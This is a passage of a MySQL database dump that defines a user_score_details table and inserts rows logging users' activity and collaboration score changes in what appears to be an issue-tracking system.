{}\n',0,NULL),(106,131,'--- {}\n',0,NULL),(107,152,'--- {}\n',0,NULL),(108,129,'--- {}\n',0,NULL),(109,165,'--- {}\n',0,NULL),(110,167,'--- {}\n',0,NULL),(111,178,'--- {}\n',0,NULL),(112,128,'--- {}\n',0,NULL),(113,174,'--- {}\n',0,NULL),(114,193,'--- {}\n',0,NULL),(115,156,'--- {}\n',0,NULL),(116,162,'--- {}\n',0,NULL),(117,208,'--- {}\n',0,NULL),(118,215,'--- {}\n',0,NULL),(119,135,'--- {}\n',0,NULL),(120,220,'--- {}\n',0,NULL);
|
||
/*!40000 ALTER TABLE `user_preferences` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_score_details`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_score_details`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_score_details` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`current_user_id` int(11) DEFAULT NULL,
|
||
`target_user_id` int(11) DEFAULT NULL,
|
||
`score_type` varchar(255) DEFAULT NULL,
|
||
`score_action` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`old_score` int(11) DEFAULT NULL,
|
||
`new_score` int(11) DEFAULT NULL,
|
||
`current_user_level` int(11) DEFAULT NULL,
|
||
`target_user_level` int(11) DEFAULT NULL,
|
||
`score_changeable_obj_id` int(11) DEFAULT NULL,
|
||
`score_changeable_obj_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=380 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_score_details`
|
||
--
|
||
|
||
LOCK TABLES `user_score_details` WRITE;
|
||
/*!40000 ALTER TABLE `user_score_details` DISABLE KEYS */;
|
||
INSERT INTO `user_score_details` VALUES (1,4,1,'influence','followed_by',1,0,2,1,3,23,'Watcher','2018-07-11 10:26:14','2018-07-11 10:26:14'),(2,4,1,'influence','cancel_followed',1,2,0,1,3,23,'Watcher','2018-07-11 10:26:20','2018-07-11 10:26:20'),(3,1,NULL,'active','post_issue',1,0,4,3,NULL,1,'Issue','2018-07-18 16:50:44','2018-07-18 16:50:44'),(4,1,NULL,'active','post_issue',1,4,8,3,NULL,2,'Issue','2018-07-19 09:48:42','2018-07-19 09:48:42'),(5,1,NULL,'active','post_issue',1,8,12,3,NULL,3,'Issue','2018-07-19 09:52:32','2018-07-19 09:52:32'),(6,1,NULL,'active','post_issue',1,12,16,3,NULL,4,'Issue','2018-07-20 10:01:50','2018-07-20 10:01:50'),(7,1,NULL,'active','post_issue',1,16,20,3,NULL,5,'Issue','2018-07-20 10:04:20','2018-07-20 10:04:20'),(8,5,NULL,'active','post_issue',5,0,4,1,NULL,6,'Issue','2018-07-20 10:17:47','2018-07-20 10:17:47'),(9,5,NULL,'active','post_issue',5,4,8,1,NULL,7,'Issue','2018-07-20 10:18:02','2018-07-20 10:18:02'),(10,5,NULL,'active','post_issue',5,8,12,1,NULL,8,'Issue','2018-07-20 10:18:18','2018-07-20 10:18:18'),(11,5,NULL,'active','post_issue',5,12,16,1,NULL,9,'Issue','2018-07-20 10:19:30','2018-07-20 10:19:30'),(12,5,NULL,'active','post_issue',5,16,20,1,NULL,10,'Issue','2018-07-20 10:19:50','2018-07-20 10:19:50'),(13,5,NULL,'active','post_issue',5,20,24,1,NULL,11,'Issue','2018-07-20 10:21:01','2018-07-20 10:21:01'),(14,5,NULL,'active','post_issue',5,24,28,1,NULL,12,'Issue','2018-07-20 10:21:31','2018-07-20 10:21:31'),(15,5,NULL,'active','post_issue',5,28,32,1,NULL,13,'Issue','2018-07-20 10:22:04','2018-07-20 10:22:04'),(16,5,NULL,'active','post_issue',5,32,36,1,NULL,14,'Issue','2018-07-20 10:22:24','2018-07-20 10:22:24'),(17,5,NULL,'active','post_issue',5,36,40,1,NULL,15,'Issue','2018-07-20 10:22:40','2018-07-20 10:22:40'),(18,6,NULL,'active','post_issue',6,0,4,1,NULL,16,'Issue','2018-07-20 14:50:29','2018-07-20 14:50:29'),(19,6,NULL,'active','post_issue',6,4,8,1,NULL,17,'Issue','2018-07-20 14:51:24','2018-07-20 14:51:24'),(20,5,5,'collaboration','post_issue_message',5,0,1,1,1,10,'Journal','2018-07-23 14:34:19','2018-07-23 14:34:19'),(21,5,NULL,'active','post_issue',5,40,44,1,NULL,18,'Issue','2018-07-23 14:35:05','2018-07-23 14:35:05'),(22,5,NULL,'active','post_issue',5,44,48,1,NULL,19,'Issue','2018-07-23 14:38:15','2018-07-23 14:38:15'),(23,5,1,'influence','followed_by',1,0,2,1,3,24,'Watcher','2018-08-02 22:54:11','2018-08-02 22:54:11'),(24,1,NULL,'active','post_issue',1,20,24,3,NULL,20,'Issue','2018-08-03 16:40:00','2018-08-03 16:40:00'),(25,1,6,'collaboration','post_issue_message',1,0,1,3,1,13,'Journal','2018-08-03 16:48:17','2018-08-03 16:48:17'),(26,1,6,'collaboration','post_issue_message',1,1,2,3,1,14,'Journal','2018-08-03 17:06:12','2018-08-03 17:06:12'),(27,1,1,'collaboration','post_issue_message',1,2,3,3,3,15,'Journal','2018-08-03 17:07:26','2018-08-03 17:07:26'),(28,1,6,'collaboration','post_issue_message',1,3,4,3,1,16,'Journal','2018-08-03 17:09:38','2018-08-03 17:09:38'),(29,1,6,'collaboration','post_issue_message',1,4,5,3,1,17,'Journal','2018-08-03 17:10:39','2018-08-03 17:10:39'),(30,1,6,'collaboration','post_issue_message',1,5,6,3,1,18,'Journal','2018-08-03 17:11:00','2018-08-03 17:11:00'),(31,1,NULL,'active','post_issue',1,24,28,3,NULL,21,'Issue','2018-08-03 17:50:18','2018-08-03 17:50:18'),(32,6,NULL,'active','post_issue',6,8,12,1,NULL,22,'Issue','2018-08-03 18:35:14','2018-08-03 18:35:14'),(33,1,NULL,'active','post_issue',1,28,32,3,NULL,23,'Issue','2018-08-03 18:50:40','2018-08-03 18:50:40'),(34,1,NULL,'active','post_issue',1,32,36,3,NULL,24,'Issue','2018-08-03 18:52:08','2018-08-03 18:52:08'),(35,5,5,'collaboration','post_issue_message',5,1,2,1,1,25,'Journal','2018-08-08 09:21:04','2018-08-08 09:21:04'),(36,5,5,'collaboration','post_issue_message',5,2,3,1,1,26,'Journal','2018-08-08 09:21:34','2018-08-08 09:21:34'),(37,5,5,'collaboration','post_issue_message',5,3,4,1,1,27,'Journal','2018-08-08 09:22:07','2018-08-08 09:22:07'),(38,5,5,'collaboration','post_issue_message',5,4,5,1,1,28,'Journal','2018-08-08 09:22:35','2018-08-08 09:22:35'),(39,5,NULL,'active','post_issue',5,48,52,1,NULL,25,'Issue','2018-08-08 09:29:58','2018-08-08 09:29:58'),(40,1,5,'collaboration','post_issue_message',1,6,7,3,1,30,'Journal','2018-08-10 09:18:52','2018-08-10 09:18:52'),(41,1,5,'collaboration','post_issue_message',1,7,8,3,1,31,'Journal','2018-08-10 09:19:06','2018-08-10 09:19:06'),(42,5,5,'collaboration','post_issue_message',5,5,6,1,1,32,'Journal','2018-08-10 09:19:23','2018-08-10 09:19:23'),(43,1,NULL,'active','post_issue',1,36,40,3,NULL,26,'Issue','2018-11-14 14:54:47','2018-11-14 14:54:47'),(44,1,NULL,'active','post_issue',1,40,44,3,NULL,27,'Issue','2018-11-22 23:27:43','2018-11-22 23:27:43'),(45,1,NULL,'active','post_issue',1,44,48,3,NULL,28,'Issue','2018-11-23 00:37:09','2018-11-23 00:37:09'),(46,1,NULL,'active','post_issue',1,48,52,3,NULL,29,'Issue','2018-11-23 00:37:57','2018-11-23 00:37:57'),(47,19,NULL,'active','post_issue',19,0,4,1,NULL,30,'Issue','2019-01-15 15:08:31','2019-01-15 15:08:31'),(48,19,NULL,'active','post_issue',19,4,8,1,NULL,31,'Issue','2019-01-21 10:17:25','2019-01-21 10:17:25'),(49,1,NULL,'active','post_issue',1,52,56,3,NULL,32,'Issue','2019-01-21 15:39:03','2019-01-21 15:39:03'),(50,1,NULL,'active','update_issue_ratio',1,56,58,3,NULL,32,'Issue','2019-01-21 15:40:09','2019-01-21 15:40:09'),(51,1,NULL,'collaboration','change_issue_status',1,8,9,3,NULL,32,'Issue','2019-01-21 15:40:10','2019-01-21 15:40:10'),(52,1,NULL,'active','update_issue_ratio',1,58,60,3,NULL,32,'Issue','2019-01-21 15:40:30','2019-01-21 15:40:30'),(53,1,NULL,'collaboration','change_issue_status',1,9,10,3,NULL,32,'Issue','2019-01-21 15:40:30','2019-01-21 15:40:30'),(54,1,NULL,'active','post_issue',1,60,64,3,NULL,33,'Issue','2019-01-21 15:43:00','2019-01-21 15:43:00'),(55,1,NULL,'active','post_issue',1,64,68,3,NULL,34,'Issue','2019-01-21 15:44:48','2019-01-21 15:44:48'),(56,1,NULL,'active','post_issue',1,68,72,3,NULL,35,'Issue','2019-01-22 00:35:19','2019-01-22 00:35:19'),(57,1,NULL,'active','post_issue',1,72,76,3,NULL,36,'Issue','2019-01-22 00:37:13','2019-01-22 00:37:13'),(58,1,NULL,'active','post_issue',1,76,80,3,NULL,37,'Issue','2019-01-22 00:39:45','2019-01-22 00:39:45'),(59,1,NULL,'active','post_issue',1,80,84,3,NULL,38,'Issue','2019-01-22 00:40:32','2019-01-22 00:40:32'),(60,1,NULL,'active','update_issue_ratio',1,84,86,3,NULL,38,'Issue','2019-01-22 00:45:20','2019-01-22 00:45:20'),(61,1,NULL,'active','update_issue_ratio',1,86,88,3,NULL,38,'Issue','2019-01-22 00:46:41','2019-01-22 00:46:41'),(62,1,NULL,'active','post_issue',1,88,92,3,NULL,39,'Issue','2019-01-22 00:49:47','2019-01-22 00:49:47'),(63,1,NULL,'active','post_issue',1,92,96,3,NULL,40,'Issue','2019-01-22 00:50:45','2019-01-22 00:50:45'),(64,1,NULL,'active','update_issue_ratio',1,96,98,3,NULL,38,'Issue','2019-01-22 00:57:05','2019-01-22 00:57:05'),(65,1,NULL,'collaboration','change_issue_status',1,10,11,3,NULL,38,'Issue','2019-01-22 00:57:05','2019-01-22 00:57:05'),(66,1,NULL,'active','post_issue',1,98,102,3,NULL,41,'Issue','2019-01-22 09:14:03','2019-01-22 09:14:03'),(67,1,NULL,'active','post_issue',1,102,106,3,NULL,42,'Issue','2019-01-22 09:19:46','2019-01-22 09:19:46'),(68,1,NULL,'active','update_issue_ratio',1,106,108,3,NULL,41,'Issue','2019-01-22 09:20:38','2019-01-22 09:20:38'),(69,26,NULL,'active','post_issue',26,0,4,1,NULL,43,'Issue','2019-03-05 15:49:52','2019-03-05 15:49:52'),(70,43,NULL,'active','post_issue',43,0,4,3,NULL,44,'Issue','2019-04-17 10:07:15','2019-04-17 10:07:15'),(71,26,NULL,'active','post_issue',26,4,8,1,NULL,45,'Issue','2019-04-17 13:19:30','2019-04-17 13:19:30'),(72,26,26,'collaboration','post_issue_message',26,0,1,1,1,42,'Journal','2019-04-17 13:35:01','2019-04-17 13:35:01'),(73,26,26,'collaboration','post_issue_message',26,1,2,1,1,43,'Journal','2019-04-17 13:42:39','2019-04-17 13:42:39'),(74,26,26,'collaboration','delete_issue_message',26,2,1,1,1,43,'Journal','2019-04-17 13:42:52','2019-04-17 13:42:52'),(75,26,26,'collaboration','post_issue_message',26,1,2,1,1,44,'Journal','2019-04-17 13:44:15','2019-04-17 13:44:15'),(76,26,43,'collaboration','post_issue_message',26,2,3,1,3,46,'Journal','2019-04-17 14:02:47','2019-04-17 14:02:47'),(77,26,NULL,'active','post_issue',26,8,12,1,NULL,46,'Issue','2019-04-17 14:23:09','2019-04-17 14:23:09'),(78,43,43,'collaboration','post_issue_message',43,0,1,3,3,50,'Journal','2019-04-17 16:21:17','2019-04-17 16:21:17'),(79,43,43,'collaboration','post_issue_message',43,1,2,3,3,51,'Journal','2019-04-17 17:36:14','2019-04-17 17:36:14'),(80,26,26,'collaboration','post_issue_message',26,3,4,1,1,52,'Journal','2019-04-17 21:27:02','2019-04-17 21:27:02'),(81,26,26,'collaboration','delete_issue_message',26,4,3,1,1,42,'Journal','2019-04-17 21:27:18','2019-04-17 21:27:18'),(82,26,26,'collaboration','post_issue_message',26,3,4,1,1,53,'Journal','2019-04-17 22:29:56','2019-04-17 22:29:56'),(83,26,26,'collaboration','delete_issue_message',26,4,3,1,1,52,'Journal','2019-04-17 22:30:00','2019-04-17 22:30:00'),(84,26,26,'collaboration','post_issue_message',26,3,4,1,1,54,'Journal','2019-04-18 17:09:18','2019-04-18 17:09:18'),(85,26,26,'collaboration','post_issue_message',26,4,5,1,1,55,'Journal','2019-04-18 17:12:36','2019-04-18 17:12:36'),(86,26,26,'collaboration','delete_issue_message',26,5,4,1,1,44,'Journal','2019-04-18 17:12:50','2019-04-18 17:12:50'),(87,26,26,'collaboration','delete_issue_message',26,4,3,1,1,55,'Journal','2019-04-18 17:13:27','2019-04-18 17:13:27'),(88,26,26,'collaboration','post_issue_message',26,3,4,1,1,56,'Journal','2019-04-18 17:13:41','2019-04-18 17:13:41'),(89,26,NULL,'active','post_issue',26,12,16,1,NULL,47,'Issue','2019-04-18 17:52:48','2019-04-18 17:52:48'),(90,26,26,'collaboration','post_issue_message',26,4,5,1,1,57,'Journal','2019-04-18 17:53:15','2019-04-18 17:53:15'),(91,26,26,'collaboration','post_issue_message',26,5,6,1,1,58,'Journal','2019-04-18 17:57:30','2019-04-18 17:57:30'),(92,26,NULL,'active','post_issue',26,16,20,1,NULL,48,'Issue','2019-04-29 11:20:03','2019-04-29 11:20:03'),(93,26,26,'collaboration','post_issue_message',26,6,7,1,1,59,'Journal','2019-04-29 11:25:08','2019-04-29 11:25:08'),(94,26,NULL,'active','post_issue',26,20,24,1,NULL,49,'Issue','2019-04-29 11:30:13','2019-04-29 11:30:13'),(95,26,26,'collaboration','post_issue_message',26,7,8,1,1,60,'Journal','2019-04-29 11:33:05','2019-04-29 11:33:05'),(96,26,NULL,'active','post_issue',26,24,28,1,NULL,50,'Issue','2019-04-29 11:42:44','2019-04-29 11:42:44'),(97,26,26,'collaboration','post_issue_message',26,8,9,1,1,61,'Journal','2019-04-29 13:22:20','2019-04-29 13:22:20'),(98,51,26,'collaboration','post_issue_message',51,0,1,1,1,62,'Journal','2019-08-07 15:03:10','2019-08-07 15:03:10'),(99,46,NULL,'active','post_issue',46,0,4,1,NULL,51,'Issue','2019-08-08 08:48:02','2019-08-08 08:48:02'),(100,49,46,'influence','followed_by',46,0,2,1,1,25,'Watcher','2019-08-08 11:28:31','2019-08-08 11:28:31'),(101,49,46,'influence','cancel_followed',46,2,0,1,1,25,'Watcher','2019-08-08 11:28:37','2019-08-08 11:28:37'),(102,49,46,'influence','followed_by',46,0,2,1,1,26,'Watcher','2019-08-08 11:29:24','2019-08-08 11:29:24'),(103,49,46,'influence','cancel_followed',46,2,0,1,1,26,'Watcher','2019-08-08 11:29:25','2019-08-08 11:29:25'),(104,49,NULL,'active','post_issue',49,0,4,1,NULL,52,'Issue','2019-08-08 15:34:53','2019-08-08 15:34:53'),(105,49,50,'influence','followed_by',50,0,2,1,3,27,'Watcher','2019-08-13 08:47:54','2019-08-13 08:47:54'),(106,50,NULL,'active','post_issue',50,0,4,3,NULL,53,'Issue','2019-08-13 16:32:02','2019-08-13 16:32:02'),(107,46,NULL,'active','post_issue',46,4,8,3,NULL,54,'Issue','2019-08-14 08:17:58','2019-08-14 08:17:58'),(108,50,53,'influence','followed_by',53,0,2,3,3,28,'Watcher','2019-08-14 10:11:03','2019-08-14 10:11:03'),(109,46,26,'collaboration','post_issue_message',46,0,1,3,1,63,'Journal','2019-08-14 14:35:38','2019-08-14 14:35:38'),(110,50,NULL,'active','post_issue',50,4,8,3,NULL,55,'Issue','2019-08-16 09:24:33','2019-08-16 09:24:33'),(111,50,50,'collaboration','post_issue_message',50,0,1,3,3,64,'Journal','2019-08-16 09:24:46','2019-08-16 09:24:46'),(112,50,NULL,'active','post_issue',50,8,12,3,NULL,56,'Issue','2019-08-23 15:09:37','2019-08-23 15:09:37'),(113,50,50,'collaboration','post_issue_message',50,1,2,3,3,65,'Journal','2019-08-24 14:51:21','2019-08-24 14:51:21'),(114,50,NULL,'active','post_issue',50,12,16,3,NULL,57,'Issue','2019-09-02 08:56:25','2019-09-02 08:56:25'),(115,50,NULL,'active','post_issue',50,16,20,3,NULL,58,'Issue','2019-09-02 10:04:20','2019-09-02 10:04:20'),(116,20,NULL,'active','post_issue',20,0,4,3,NULL,59,'Issue','2019-10-08 10:44:52','2019-10-08 10:44:52'),(117,20,NULL,'active','post_issue',20,4,8,3,NULL,60,'Issue','2019-10-08 11:00:58','2019-10-08 11:00:58'),(118,20,NULL,'active','update_issue_ratio',20,8,10,3,NULL,60,'Issue','2019-10-08 11:02:36','2019-10-08 11:02:36'),(119,20,NULL,'collaboration','change_issue_status',20,0,1,3,NULL,60,'Issue','2019-10-08 11:02:36','2019-10-08 11:02:36'),(120,20,NULL,'active','post_issue',20,10,14,3,NULL,61,'Issue','2019-10-08 13:47:02','2019-10-08 13:47:02'),(121,46,NULL,'active','post_issue',46,8,12,3,NULL,62,'Issue','2019-10-23 16:14:16','2019-10-23 16:14:16'),(122,46,46,'collaboration','post_issue_message',46,1,2,3,3,68,'Journal','2019-10-23 16:15:25','2019-10-23 16:15:25'),(123,49,NULL,'active','post_issue',49,4,8,3,NULL,63,'Issue','2019-10-23 16:45:23','2019-10-23 16:45:23'),(124,49,46,'collaboration','post_issue_message',49,0,1,3,3,70,'Journal','2019-10-23 16:54:36','2019-10-23 16:54:36'),(125,46,NULL,'active','update_issue_ratio',46,12,14,3,NULL,62,'Issue','2019-10-23 16:54:49','2019-10-23 16:54:49'),(126,61,NULL,'active','post_issue',61,0,4,3,NULL,64,'Issue','2019-10-31 16:54:19','2019-10-31 16:54:19'),(127,46,NULL,'active','post_issue',46,14,18,3,NULL,65,'Issue','2019-10-31 16:57:23','2019-10-31 16:57:23'),(128,46,61,'collaboration','post_issue_message',46,2,3,3,3,72,'Journal','2019-10-31 17:00:14','2019-10-31 17:00:14'),(129,61,46,'collaboration','post_issue_message',61,0,1,3,3,73,'Journal','2019-10-31 17:00:59','2019-10-31 17:00:59'),(130,46,NULL,'active','post_issue',46,18,22,3,NULL,66,'Issue','2019-10-31 17:02:37','2019-10-31 17:02:37'),(131,61,NULL,'active','post_issue',61,4,8,3,NULL,67,'Issue','2019-10-31 17:02:39','2019-10-31 17:02:39'),(132,46,NULL,'active','post_issue',46,22,26,3,NULL,68,'Issue','2019-10-31 17:04:30','2019-10-31 17:04:30'),(133,59,61,'collaboration','post_issue_message',59,0,1,3,3,74,'Journal','2019-10-31 17:04:31','2019-10-31 17:04:31'),(134,46,46,'collaboration','post_issue_message',46,3,4,3,3,75,'Journal','2019-10-31 17:04:53','2019-10-31 17:04:53'),(135,46,46,'collaboration','post_issue_message',46,4,5,3,3,76,'Journal','2019-10-31 17:05:24','2019-10-31 17:05:24'),(136,61,NULL,'active','update_issue_ratio',61,8,10,3,NULL,67,'Issue','2019-10-31 17:05:53','2019-10-31 17:05:53'),(137,61,NULL,'collaboration','change_issue_status',61,1,2,3,NULL,67,'Issue','2019-10-31 17:05:53','2019-10-31 17:05:53'),(138,46,NULL,'active','post_issue',46,26,30,3,NULL,69,'Issue','2019-11-06 16:38:25','2019-11-06 16:38:25'),(139,49,46,'collaboration','post_issue_message',49,1,2,3,3,78,'Journal','2019-11-06 16:39:06','2019-11-06 16:39:06'),(140,49,NULL,'active','post_issue',49,8,12,3,NULL,70,'Issue','2019-11-07 11:14:16','2019-11-07 11:14:16'),(141,49,NULL,'active','post_issue',49,12,16,3,NULL,71,'Issue','2019-11-07 11:14:16','2019-11-07 11:14:16'),(142,46,NULL,'active','post_issue',46,30,34,3,NULL,72,'Issue','2019-11-07 11:15:06','2019-11-07 11:15:06'),(143,46,NULL,'active','post_issue',46,34,38,3,NULL,73,'Issue','2019-11-07 16:05:58','2019-11-07 16:05:58'),(144,46,46,'collaboration','post_issue_message',46,5,6,3,3,80,'Journal','2019-11-07 16:06:58','2019-11-07 16:06:58'),(145,46,46,'collaboration','post_issue_message',46,6,7,3,3,81,'Journal','2019-11-07 16:07:14','2019-11-07 16:07:14'),(146,64,NULL,'active','post_issue',64,0,4,1,NULL,74,'Issue','2019-11-07 16:21:16','2019-11-07 16:21:16'),(147,46,64,'collaboration','post_issue_message',46,7,8,3,1,82,'Journal','2019-11-07 16:21:55','2019-11-07 16:21:55'),(148,71,64,'collaboration','post_issue_message',71,0,1,1,1,83,'Journal','2019-11-08 09:11:56','2019-11-08 09:11:56'),(149,65,NULL,'active','post_issue',65,0,4,1,NULL,75,'Issue','2019-11-08 10:59:33','2019-11-08 10:59:33'),(150,65,NULL,'active','update_issue_ratio',65,4,6,1,NULL,75,'Issue','2019-11-08 11:08:18','2019-11-08 11:08:18'),(151,65,NULL,'collaboration','change_issue_status',65,0,1,1,NULL,75,'Issue','2019-11-08 11:08:18','2019-11-08 11:08:18'),(152,63,NULL,'active','post_issue',63,0,4,1,NULL,76,'Issue','2019-11-08 11:10:36','2019-11-08 11:10:36'),(153,49,63,'collaboration','post_issue_message',49,2,3,3,1,85,'Journal','2019-11-08 11:13:50','2019-11-08 11:13:50'),(154,65,NULL,'active','post_issue',65,6,10,1,NULL,77,'Issue','2019-11-08 11:14:43','2019-11-08 11:14:43'),(155,64,NULL,'active','post_issue',64,4,8,1,NULL,78,'Issue','2019-11-08 11:15:17','2019-11-08 11:15:17'),(156,63,NULL,'active','post_issue',63,4,8,1,NULL,79,'Issue','2019-11-08 11:15:37','2019-11-08 11:15:37'),(157,64,NULL,'active','post_issue',64,8,12,1,NULL,80,'Issue','2019-11-08 11:15:58','2019-11-08 11:15:58'),(158,64,NULL,'active','post_issue',64,12,16,1,NULL,81,'Issue','2019-11-08 11:16:33','2019-11-08 11:16:33'),(159,49,NULL,'active','post_issue',49,16,20,3,NULL,82,'Issue','2019-11-08 11:16:41','2019-11-08 11:16:41'),(160,64,NULL,'active','post_issue',64,16,20,1,NULL,83,'Issue','2019-11-08 11:17:09','2019-11-08 11:17:09'),(161,64,NULL,'active','post_issue',64,20,24,1,NULL,84,'Issue','2019-11-08 11:17:49','2019-11-08 11:17:49'),(162,63,NULL,'active','post_issue',63,8,12,1,NULL,85,'Issue','2019-11-08 11:18:06','2019-11-08 11:18:06'),(163,64,NULL,'active','post_issue',64,24,28,1,NULL,86,'Issue','2019-11-08 11:18:44','2019-11-08 11:18:44'),(164,65,NULL,'active','post_issue',65,10,14,1,NULL,87,'Issue','2019-11-08 11:19:24','2019-11-08 11:19:24'),(165,49,65,'collaboration','post_issue_message',49,3,4,3,1,86,'Journal','2019-11-08 11:20:01','2019-11-08 11:20:01'),(166,49,NULL,'active','post_issue',49,20,24,3,NULL,88,'Issue','2019-11-08 11:21:08','2019-11-08 11:21:08'),(167,65,NULL,'active','post_issue',65,14,18,1,NULL,89,'Issue','2019-11-08 11:22:20','2019-11-08 11:22:20'),(168,49,65,'collaboration','post_issue_message',49,4,5,3,1,87,'Journal','2019-11-08 11:23:03','2019-11-08 11:23:03'),(169,46,NULL,'active','post_issue',46,38,42,3,NULL,90,'Issue','2019-11-08 11:25:27','2019-11-08 11:25:27'),(170,46,NULL,'active','post_issue',46,42,46,3,NULL,91,'Issue','2019-11-08 11:27:07','2019-11-08 11:27:07'),(171,65,46,'collaboration','post_issue_message',65,1,2,1,3,88,'Journal','2019-11-08 11:27:49','2019-11-08 11:27:49'),(172,46,NULL,'active','post_issue',46,46,50,3,NULL,92,'Issue','2019-11-08 11:28:56','2019-11-08 11:28:56'),(173,65,46,'collaboration','post_issue_message',65,2,3,1,3,89,'Journal','2019-11-08 11:29:30','2019-11-08 11:29:30'),(174,63,46,'collaboration','post_issue_message',63,0,1,1,3,90,'Journal','2019-11-08 11:29:59','2019-11-08 11:29:59'),(175,65,46,'collaboration','post_issue_message',65,3,4,1,3,91,'Journal','2019-11-08 11:30:46','2019-11-08 11:30:46'),(176,46,46,'collaboration','post_issue_message',46,8,9,3,3,92,'Journal','2019-11-08 11:31:14','2019-11-08 11:31:14'),(177,63,NULL,'active','update_issue_ratio',63,12,14,1,NULL,85,'Issue','2019-11-08 11:43:04','2019-11-08 11:43:04'),(178,63,NULL,'collaboration','change_issue_status',63,1,2,1,NULL,85,'Issue','2019-11-08 11:43:04','2019-11-08 11:43:04'),(179,65,NULL,'active','update_issue_ratio',65,18,20,1,NULL,75,'Issue','2019-11-08 11:43:35','2019-11-08 11:43:35'),(180,65,NULL,'active','update_issue_ratio',65,20,22,1,NULL,75,'Issue','2019-11-08 11:44:16','2019-11-08 11:44:16'),(181,46,NULL,'active','update_issue_ratio',46,50,52,3,NULL,73,'Issue','2019-11-08 14:35:38','2019-11-08 14:35:38'),(182,46,NULL,'collaboration','change_issue_status',46,9,10,3,NULL,73,'Issue','2019-11-08 14:35:38','2019-11-08 14:35:38'),(183,64,NULL,'active','update_issue_ratio',64,28,30,1,NULL,74,'Issue','2019-11-08 14:36:34','2019-11-08 14:36:34'),(184,63,NULL,'active','update_issue_ratio',63,14,16,1,NULL,76,'Issue','2019-11-08 14:37:02','2019-11-08 14:37:02'),(185,63,NULL,'collaboration','change_issue_status',63,2,3,1,NULL,76,'Issue','2019-11-08 14:37:02','2019-11-08 14:37:02'),(186,65,NULL,'active','update_issue_ratio',65,22,24,1,NULL,77,'Issue','2019-11-08 14:37:25','2019-11-08 14:37:25'),(187,65,NULL,'collaboration','change_issue_status',65,4,5,1,NULL,77,'Issue','2019-11-08 14:37:25','2019-11-08 14:37:25'),(188,64,NULL,'active','update_issue_ratio',64,30,32,1,NULL,78,'Issue','2019-11-08 14:37:46','2019-11-08 14:37:46'),(189,63,NULL,'active','update_issue_ratio',63,16,18,1,NULL,79,'Issue','2019-11-08 14:38:08','2019-11-08 14:38:08'),(190,64,NULL,'active','update_issue_ratio',64,32,34,1,NULL,80,'Issue','2019-11-08 14:38:27','2019-11-08 14:38:27'),(191,64,NULL,'active','update_issue_ratio',64,34,36,1,NULL,81,'Issue','2019-11-08 14:40:38','2019-11-08 14:40:38'),(192,49,NULL,'active','update_issue_ratio',49,24,26,3,NULL,82,'Issue','2019-11-08 14:41:09','2019-11-08 14:41:09'),(193,64,NULL,'active','update_issue_ratio',64,36,38,1,NULL,83,'Issue','2019-11-08 14:44:36','2019-11-08 14:44:36'),(194,64,NULL,'collaboration','change_issue_status',64,0,1,1,NULL,83,'Issue','2019-11-08 14:44:36','2019-11-08 14:44:36'),(195,64,NULL,'active','update_issue_ratio',64,38,40,1,NULL,84,'Issue','2019-11-08 14:44:48','2019-11-08 14:44:48'),(196,64,NULL,'collaboration','change_issue_status',64,1,2,1,NULL,84,'Issue','2019-11-08 14:44:48','2019-11-08 14:44:48'),(197,64,NULL,'active','update_issue_ratio',64,40,42,1,NULL,86,'Issue','2019-11-08 14:44:57','2019-11-08 14:44:57'),(198,64,NULL,'collaboration','change_issue_status',64,2,3,1,NULL,86,'Issue','2019-11-08 14:44:57','2019-11-08 14:44:57'),(199,65,NULL,'active','update_issue_ratio',65,24,26,1,NULL,87,'Issue','2019-11-08 14:49:14','2019-11-08 14:49:14'),(200,65,NULL,'collaboration','change_issue_status',65,5,6,1,NULL,87,'Issue','2019-11-08 14:49:14','2019-11-08 14:49:14'),(201,49,NULL,'active','update_issue_ratio',49,26,28,3,NULL,88,'Issue','2019-11-08 14:49:24','2019-11-08 14:49:24'),(202,49,NULL,'collaboration','change_issue_status',49,5,6,3,NULL,88,'Issue','2019-11-08 14:49:24','2019-11-08 14:49:24'),(203,65,NULL,'active','update_issue_ratio',65,26,28,1,NULL,89,'Issue','2019-11-08 14:49:33','2019-11-08 14:49:33'),(204,65,NULL,'collaboration','change_issue_status',65,6,7,1,NULL,89,'Issue','2019-11-08 14:49:33','2019-11-08 14:49:33'),(205,46,NULL,'active','update_issue_ratio',46,52,54,3,NULL,91,'Issue','2019-11-08 14:49:43','2019-11-08 14:49:43'),(206,46,NULL,'collaboration','change_issue_status',46,10,11,3,NULL,91,'Issue','2019-11-08 14:49:43','2019-11-08 14:49:43'),(207,46,NULL,'active','update_issue_ratio',46,54,56,3,NULL,92,'Issue','2019-11-08 14:49:53','2019-11-08 14:49:53'),(208,46,NULL,'collaboration','change_issue_status',46,11,12,3,NULL,92,'Issue','2019-11-08 14:49:53','2019-11-08 14:49:53'),(209,66,NULL,'active','post_issue',66,0,4,1,NULL,93,'Issue','2019-11-10 12:44:07','2019-11-10 12:44:07'),(210,66,NULL,'active','post_issue',66,4,8,1,NULL,94,'Issue','2019-11-10 12:44:50','2019-11-10 12:44:50'),(211,66,66,'collaboration','post_issue_message',66,0,1,1,1,119,'Journal','2019-11-10 12:45:03','2019-11-10 12:45:03'),(212,66,NULL,'active','post_issue',66,8,12,1,NULL,95,'Issue','2019-11-10 12:45:33','2019-11-10 12:45:33'),(213,66,NULL,'active','post_issue',66,12,16,1,NULL,96,'Issue','2019-11-10 12:46:08','2019-11-10 12:46:08'),(214,66,NULL,'active','update_issue_ratio',66,16,18,1,NULL,96,'Issue','2019-11-11 08:12:56','2019-11-11 08:12:56'),(215,66,NULL,'collaboration','change_issue_status',66,1,2,1,NULL,96,'Issue','2019-11-11 08:12:56','2019-11-11 08:12:56'),(216,66,NULL,'active','update_issue_ratio',66,18,20,1,NULL,95,'Issue','2019-11-11 08:13:10','2019-11-11 